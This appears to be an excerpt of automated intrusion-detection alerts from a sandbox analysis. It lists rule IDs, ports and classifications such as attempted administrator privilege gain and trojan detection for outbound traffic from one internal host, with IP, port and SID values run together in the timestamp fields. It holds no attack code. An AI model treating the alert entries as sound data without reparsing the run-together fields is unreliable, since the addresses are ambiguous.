            SID:2846457
            Source Port:51832
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.210.58.4753630802846457 10/23/22-17:57:31.246009
            SID:2846457
            Source Port:53630
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.140.156.11541696802846380 10/23/22-17:58:27.232677
            SID:2846380
            Source Port:41696
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.198.122.21058200802027121 10/23/22-17:57:02.444082
            SID:2027121
            Source Port:58200
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.189.124.16848686802846380 10/23/22-17:58:39.278764
            SID:2846380
            Source Port:48686
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.134.160.16644262802846457 10/23/22-17:57:21.039601
            SID:2846457
            Source Port:44262
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.125.36.19355200802846380 10/23/22-17:58:19.935272
            SID:2846380
            Source Port:55200
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.209.13035434802027121 10/23/22-17:57:49.370080
            SID:2027121
            Source Port:35434
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2386.18.52.1952250802846380 10/23/22-17:57:03.509591
            SID:2846380
            Source Port:52250
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.13.189.14347472802846457 10/23/22-17:58:26.435827
            SID:2846457
            Source Port:47472
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.62.37.24154112528692027339 10/23/22-17:57:35.281734
            SID:2027339
            Source Port:54112
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2386.49.88.6844090802846380 10/23/22-17:57:07.231236
            SID:2846380
            Source Port:44090
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.137.11934560802027121 10/23/22-17:57:38.647172
            SID:2027121
            Source Port:34560
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.246.6035808802027121 10/23/22-17:57:21.027576
            SID:2027121
            Source Port:35808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.117.64.9551444802846457 10/23/22-17:58:02.783091
            SID:2846457
            Source Port:51444
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.209.229.12640488802027121 10/23/22-17:57:38.611987
            SID:2027121
            Source Port:40488
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.86.107.25533514802027121 10/23/22-17:58:24.061225
            SID:2027121
            Source Port:33514
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.101.132.20257296802846457 10/23/22-17:57:53.192191
            SID:2846457
            Source Port:57296
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.80.145.19634064802027121 10/23/22-17:56:45.932630
            SID:2027121
            Source Port:34064
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.249.162.20952994802846380 10/23/22-17:57:11.381212
            SID:2846380
            Source Port:52994
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.219.238.6041306802846380 10/23/22-17:56:39.207705
            SID:2846380
            Source Port:41306
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.154.201.1749030802027121 10/23/22-17:57:28.450137
            SID:2027121
            Source Port:49030
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.109.13.1650084802846457 10/23/22-17:58:23.953618
            SID:2846457
            Source Port:50084
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.58.51.23142938802027121 10/23/22-17:58:07.450809
            SID:2027121
            Source Port:42938
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.221.232.12851092802027121 10/23/22-17:56:39.143232
            SID:2027121
            Source Port:51092
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.87.103.7847822802846380 10/23/22-17:56:47.121117
            SID:2846380
            Source Port:47822
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.252.13.12746600802846457 10/23/22-17:57:14.309344
            SID:2846457
            Source Port:46600
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.13.134.22353186802846457 10/23/22-17:57:09.737426
            SID:2846457
            Source Port:53186
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.67.251.18037570802835222 10/23/22-17:57:25.165890
            SID:2835222
            Source Port:37570
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2383.69.237.4036548802846380 10/23/22-17:57:01.378497
            SID:2846380
            Source Port:36548
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.110.200.23234112802027121 10/23/22-17:57:52.106593
            SID:2027121
            Source Port:34112
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.107.213.9935238802027121 10/23/22-17:58:12.793297
            SID:2027121
            Source Port:35238
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.33.242.7859182802846457 10/23/22-17:57:56.404839
            SID:2846457
            Source Port:59182
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.67.14.9148966802846457 10/23/22-17:57:31.852938
            SID:2846457
            Source Port:48966
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.211.58.2960172802846380 10/23/22-17:58:06.169767
            SID:2846380
            Source Port:60172
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.240.228.13733426802841623 10/23/22-17:58:35.805001
            SID:2841623
            Source Port:33426
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.86.101.5242950802027121 10/23/22-17:58:29.901981
            SID:2027121
            Source Port:42950
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.229.82.13138664802846457 10/23/22-17:57:31.246108
            SID:2846457
            Source Port:38664
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.39.153.8258878802846457 10/23/22-17:57:22.351125
            SID:2846457
            Source Port:58878
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.196.88.2539984802027121 10/23/22-17:58:25.337026
            SID:2027121
            Source Port:39984
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.64.241.11558706802846380 10/23/22-17:58:06.155798
            SID:2846380
            Source Port:58706
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.247.42.18050126802846380 10/23/22-17:57:03.533357
            SID:2846380
            Source Port:50126
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.163.224.548962802846457 10/23/22-17:57:41.161507
            SID:2846457
            Source Port:48962
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.180.211.4734354802846457 10/23/22-17:57:08.382034
            SID:2846457
            Source Port:34354
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.217.229.18236046802027121 10/23/22-17:57:49.328686
            SID:2027121
            Source Port:36046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.1.210.24457176802846457 10/23/22-17:56:51.962090
            SID:2846457
            Source Port:57176
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2341.84.236.4458066802835221 10/23/22-17:57:28.583889
            SID:2835221
            Source Port:58066
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.22.112.1160160802846457 10/23/22-17:57:55.908279
            SID:2846457
            Source Port:60160
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.165.9.5442650802846457 10/23/22-17:58:07.972110
            SID:2846457
            Source Port:42650
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.110.132.22442362802027121 10/23/22-17:58:15.281877
            SID:2027121
            Source Port:42362
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23169.60.175.3833006802846380 10/23/22-17:57:33.476688
            SID:2846380
            Source Port:33006
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.201.2.5543710802846457 10/23/22-17:58:30.729836
            SID:2846457
            Source Port:43710
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.114.129.16934894802027121 10/23/22-17:58:02.135809
            SID:2027121
            Source Port:34894
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.84.57.11652814802846457 10/23/22-17:56:48.732067
            SID:2846457
            Source Port:52814
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.254.40.18843532372152835222 10/23/22-17:58:24.312578
            SID:2835222
            Source Port:43532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.99.131.20341470802027121 10/23/22-17:57:12.950604
            SID:2027121
            Source Port:41470
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2314.67.78.2374459475472023548 10/23/22-17:57:20.639792
            SID:2023548
            Source Port:44594
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.90.61.3435636802846380 10/23/22-17:57:11.363885
            SID:2846380
            Source Port:35636
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2341.225.51.14050464802841623 10/23/22-17:58:29.466955
            SID:2841623
            Source Port:50464
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.52.121.1442868802846380 10/23/22-17:56:59.705405
            SID:2846380
            Source Port:42868
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.207.143.2444278802846380 10/23/22-17:58:00.654260
            SID:2846380
            Source Port:44278
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.79.1657016802027121 10/23/22-17:58:36.284301
            SID:2027121
            Source Port:57016
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.219.3.7558646802027121 10/23/22-17:58:32.666847
            SID:2027121
            Source Port:58646
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.91.185.3136860802846380 10/23/22-17:57:28.053844
            SID:2846380
            Source Port:36860
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.255.164.18741856802835221 10/23/22-17:57:28.948733
            SID:2835221
            Source Port:41856
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23138.68.139.15245880802835222 10/23/22-17:57:20.079588
            SID:2835222
            Source Port:45880
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2386.62.28.7751294802846380 10/23/22-17:57:35.745807
            SID:2846380
            Source Port:51294
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.62.220.18543428802846380 10/23/22-17:58:13.123154
            SID:2846380
            Source Port:43428
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.169.184.6840252802027121 10/23/22-17:58:29.877211
            SID:2027121
            Source Port:40252
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23171.249.80.2949368802846457 10/23/22-17:56:55.071442
            SID:2846457
            Source Port:49368
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.59.118.15938696802846380 10/23/22-17:57:03.800239
            SID:2846380
            Source Port:38696
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.79.232.19243574802846380 10/23/22-17:56:55.335267
            SID:2846380
            Source Port:43574
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.114.183.8345986802846457 10/23/22-17:58:15.296734
            SID:2846457
            Source Port:45986
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2370.97.199.5050206802841623 10/23/22-17:57:20.420549
            SID:2841623
            Source Port:50206
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.162.240.3958180802846380 10/23/22-17:56:39.179157
            SID:2846380
            Source Port:58180
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.211.76.13152150802846380 10/23/22-17:57:01.362718
            SID:2846380
            Source Port:52150
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.209.13035404802027121 10/23/22-17:57:49.329098
            SID:2027121
            Source Port:35404
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.119.205.16844542802027121 10/23/22-17:58:05.254176
            SID:2027121
            Source Port:44542
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.80.80.23146182802846380 10/23/22-17:56:58.420740
            SID:2846380
            Source Port:46182
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.114.145.10049256802846457 10/23/22-17:58:10.719916
            SID:2846457
            Source Port:49256
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.48.102.21838248802846380 10/23/22-17:56:55.688528
            SID:2846380
            Source Port:38248
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.215.147.145766802846457 10/23/22-17:58:10.297398
            SID:2846457
            Source Port:45766
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.31.102.22742032802841623 10/23/22-17:57:28.350931
            SID:2841623
            Source Port:42032
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.110.178.24946188802027121 10/23/22-17:57:38.635381
            SID:2027121
            Source Port:46188
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.214.153.8736188802846457 10/23/22-17:57:16.979945
            SID:2846457
            Source Port:36188
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.110.198.2150608802846457 10/23/22-17:57:02.953879
            SID:2846457
            Source Port:50608
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.252.167.1460482802846457 10/23/22-17:57:14.346119
            SID:2846457
            Source Port:60482
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.132.96.9937120802846457 10/23/22-17:57:21.038962
            SID:2846457
            Source Port:37120
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23169.197.116.3754568802846380 10/23/22-17:57:35.693778
            SID:2846380
            Source Port:54568
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.243.227.24739528802846380 10/23/22-17:58:29.770316
            SID:2846380
            Source Port:39528
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.51.126.5342256802846457 10/23/22-17:57:07.842400
            SID:2846457
            Source Port:42256
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.216.130.4550214802846457 10/23/22-17:58:17.729062
            SID:2846457
            Source Port:50214
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.246.10642012802027121 10/23/22-17:58:10.570763
            SID:2027121
            Source Port:42012
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.224.116.22736186802835222 10/23/22-17:57:06.015501
            SID:2835222
            Source Port:36186
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.110.133.24659226802027121 10/23/22-17:56:58.426789
            SID:2027121
            Source Port:59226
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2396.85.52.16641606802841623 10/23/22-17:57:12.572108
            SID:2841623
            Source Port:41606
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2323.35.133.10237012802835221 10/23/22-17:56:56.766335
            SID:2835221
            Source Port:37012
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.108.64.22843846802846457 10/23/22-17:57:37.984093
            SID:2846457
            Source Port:43846
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.241.118.18549012802841623 10/23/22-17:57:38.912493
            SID:2841623
            Source Port:49012
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.210.132.10650838802846457 10/23/22-17:58:21.698084
            SID:2846457
            Source Port:50838
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.174.100.25241648802027121 10/23/22-17:57:16.373468
            SID:2027121
            Source Port:41648
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2323.65.228.8447082802835222 10/23/22-17:57:23.996077
            SID:2835222
            Source Port:47082
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2383.64.106.10246998802846380 10/23/22-17:58:25.116542
            SID:2846380
            Source Port:46998
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.38.195.9633936802027121 10/23/22-17:57:13.280847
            SID:2027121
            Source Port:33936
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.185.250.4441702802846457 10/23/22-17:57:53.331513
            SID:2846457
            Source Port:41702
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.214.94.6837300802846380 10/23/22-17:57:25.146135
            SID:2846380
            Source Port:37300
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.100.26.22945878802027121 10/23/22-17:58:10.577129
            SID:2027121
            Source Port:45878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.74.184.19739904802027121 10/23/22-17:57:28.467060
            SID:2027121
            Source Port:39904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.15.36.25036586802846457 10/23/22-17:56:52.722301
            SID:2846457
            Source Port:36586
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.220.101.9847774802027121 10/23/22-17:57:02.452802
            SID:2027121
            Source Port:47774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.161.109.22934188802846457 10/23/22-17:57:03.014737
            SID:2846457
            Source Port:34188
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.225.59.554386802846380 10/23/22-17:58:17.196005
            SID:2846380
            Source Port:54386
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2314.78.183.385053075472835222 10/23/22-17:57:03.996947
            SID:2835222
            Source Port:50530
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.115.211.17252590802846380 10/23/22-17:57:46.395164
            SID:2846380
            Source Port:52590
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.214.129.22245272802846457 10/23/22-17:58:37.500910
            SID:2846457
            Source Port:45272
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.62.188.11246436802846380 10/23/22-17:57:49.295298
            SID:2846380
            Source Port:46436
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.119.156.19260560802846457 10/23/22-17:58:20.027477
            SID:2846457
            Source Port:60560
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23171.102.11.17739812802846457 10/23/22-17:57:59.885407
            SID:2846457
            Source Port:39812
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.149.36.443726802846457 10/23/22-17:58:32.898709
            SID:2846457
            Source Port:43726
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.242.182.4941844802846457 10/23/22-17:57:41.195958
            SID:2846457
            Source Port:41844
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.243.76.7733896802846457 10/23/22-17:57:41.308279
            SID:2846457
            Source Port:33896
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.188.222.15441452802846380 10/23/22-17:58:33.195794
            SID:2846380
            Source Port:41452
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.156.195.12942626802846457 10/23/22-17:58:26.409250
            SID:2846457
            Source Port:42626
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.59.89.11046412802846380 10/23/22-17:58:22.311626
            SID:2846380
            Source Port:46412
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.28.182.24840902802846457 10/23/22-17:57:53.231656
            SID:2846457
            Source Port:40902
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.63.215.10345942802846380 10/23/22-17:58:01.094882
            SID:2846380
            Source Port:45942
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.201.60.2048270802846380 10/23/22-17:57:54.140935
            SID:2846380
            Source Port:48270
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.217.14.7659074802027121 10/23/22-17:56:55.613450
            SID:2027121
            Source Port:59074
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.73.191.11444878802027121 10/23/22-17:58:07.342813
            SID:2027121
            Source Port:44878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.56.29.23643560802027121 10/23/22-17:57:16.491821
            SID:2027121
            Source Port:43560
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.111.132.21960622802846457 10/23/22-17:57:38.036319
            SID:2846457
            Source Port:60622
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.72.202.13055330802846380 10/23/22-17:57:38.059088
            SID:2846380
            Source Port:55330
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.162.197.16635730802846380 10/23/22-17:57:37.880943
            SID:2846380
            Source Port:35730
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.138.119.20657258802846457 10/23/22-17:57:22.372922
            SID:2846457
            Source Port:57258
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.219.1.21743922802027121 10/23/22-17:57:49.369890
            SID:2027121
            Source Port:43922
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.6.243.3151034802846457 10/23/22-17:58:13.033376
            SID:2846457
            Source Port:51034
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.57.23060274802027121 10/23/22-17:56:39.185487
            SID:2027121
            Source Port:60274
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.245.189.23942276802027121 10/23/22-17:57:13.009842
            SID:2027121
            Source Port:42276
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23171.244.21.7951536802846457 10/23/22-17:57:59.905446
            SID:2846457
            Source Port:51536
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.239.228.16541056802846380 10/23/22-17:57:18.571730
            SID:2846380
            Source Port:41056
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.228.114.9133376802846457 10/23/22-17:57:09.718912
            SID:2846457
            Source Port:33376
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.163.71.19233298802027121 10/23/22-17:57:36.430915
            SID:2027121
            Source Port:33298
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.179.137.11939670802027121 10/23/22-17:58:30.348385
            SID:2027121
            Source Port:39670
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.100.164.7734924802846457 10/23/22-17:57:14.320779
            SID:2846457
            Source Port:34924
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.128.138.15259646802846457 10/23/22-17:58:01.351303
            SID:2846457
            Source Port:59646
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.23.193.6955262802846457 10/23/22-17:57:41.525899
            SID:2846457
            Source Port:55262
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.85.68.20160890802846457 10/23/22-17:57:00.353134
            SID:2846457
            Source Port:60890
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.128.107.23245948802027121 10/23/22-17:58:17.321235
            SID:2027121
            Source Port:45948
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.249.98.19141282802027121 10/23/22-17:56:58.424234
            SID:2027121
            Source Port:41282
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.12.6.7852856802027121 10/23/22-17:57:05.217651
            SID:2027121
            Source Port:52856
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23210.129.51.3237650802841623 10/23/22-17:57:20.813133
            SID:2841623
            Source Port:37650
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.14.9836362802027121 10/23/22-17:57:02.421011
            SID:2027121
            Source Port:36362
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2386.183.147.12239070802846380 10/23/22-17:57:07.231559
            SID:2846380
            Source Port:39070
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
